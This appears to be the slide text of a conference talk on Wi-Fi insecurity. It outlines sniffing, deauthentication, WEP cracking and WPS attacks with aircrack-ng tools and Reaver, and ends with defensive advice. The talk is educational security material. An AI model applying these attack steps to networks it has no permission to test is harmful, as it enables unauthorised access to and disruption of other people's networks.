You think your Wifi is Safe? Rob Gillen @argodev
CodeStock is proudly partnered with: RecruitWise and Staff with Excellence - www.recruitwise.jobs Send instant feedback on this session via Twitter: Send a direct message with the room number to @CodeStock d codestock 406 This session is great! For more information on sending feedback using Twitter while at CodeStock, please see the “CodeStock README” in your CodeStock guide.
what we do consulting training design debuggingwho we are Founded by top experts on Microsoft – Jeffrey Richter, Jeff Prosise, and John Robbins – our mission is to help our customers achieve their goals through advanced software-based consulting and training solutions.how we do it Training • On-site instructor-led training Consulting & Debugging • Virtual instructor-led training • Architecture, analysis, and design services • Devscovery conferences • Full lifecycle custom software development • Content creation Design • Project management • User Experience Design • Debugging & performance tuning • Visual & Content Design • Video & Animation Production wintellect.com
Don’t Be StupidThe following presentation describesreal attacks on real systems. Pleasenote that most of the attacksdescribed would be considered ILLEGALif attempted on systems that you donot have explicit permission to testand attack. I assume no responsibilityfor any actions you perform based onthe content of this presentation orsubsequent conversations. Pleaseremember this basic guideline: Withknowledge comes responsibility.
DisclaimerThe content of this presentationrepresents my personal views andthoughts at the present time. Thiscontent is not endorsed by, orrepresentative in any way of myemployer nor is it intended to be aview into my work or a reflection onthe type of work that I or my groupperforms. It is simply a hobby andpersonal interest and should beconsidered as such.
Overview• Pre-Requisite Knowledge• Various Security Approaches• Tools and Attacks
Required Gear• Network Adapter that supports “Monitor” mode. – Equivalent to promiscuous mode on a normal NIC• Windows, MAC, or Linux – Linux tools tend to be more readily available
Wireless Packet Frames• Management Frames • Control Frames – Authentication – Request to Send – De-authentication (RTS) – Association Request – Clear to Send (CTS) – Association Response – Acknowledgment (AWK) – Re-association • Data Frames Request – Re-association Response – Disassociation – Beacon – Probe Request – Probe Response
Packet Sniffing• Determine the channel of the network we are interested in – required for sniffing data packets – airodump-ng• iwconfig mon0 channel 11 (demo pre/post)
Packet Injection• aireplay-ng – Inject packets onto a specific wireless network without specific association to that network – Can target specific channels, mask MAC addresses, etc. – Does not require association
Regulatory Issues• Available Channels• Radio Power Levels – iw reg set US – iw reg set BO
DEMO: Hidden SSID• Show packet capture with the SSID• Hide SSID• Prove it is now hidden• Solve for X – Passive (wait for valid client) – wireshark filter – Use aireplay-ng to send deauth packet to force the discovery• Probe Request/Probe Response packets
DEMO: Shared Key Authentication• Illustration (steal picture from Wikipedia/netgear?)• Configured AP for Shared Key/Update Client• Use airodump-ng to capture/log the authentication scheme + keystream – Wait for valid client or send deauth pkt• Use aireplay-ng to pass back the captured auth pkt• TIP: DOS by filling up AP tables (wrapper around airreplay-ng)
DEMO: WEP Encryption• Capture data packets (ARP) from a known/trusted client (airodump-ng)• Replay them/re-inject between 10- 100,000 times (aireplay-ng)• Crack them (aircrack-ng)• “Guaranteed” crack
Tools• Reaver Pro (WPS Exploit)• 4-10 hours and your network is mine
What is Safe?• Stop using Wi-Fi• Avoid open Wi-Fi networks• Always use SSL• Use VPN• Disable Auto-Connect… on *all* devices• Hard/complex network keys• WPA-Enterprise / RADIUS / PEAP / EAP-TTLS• Disable WPS!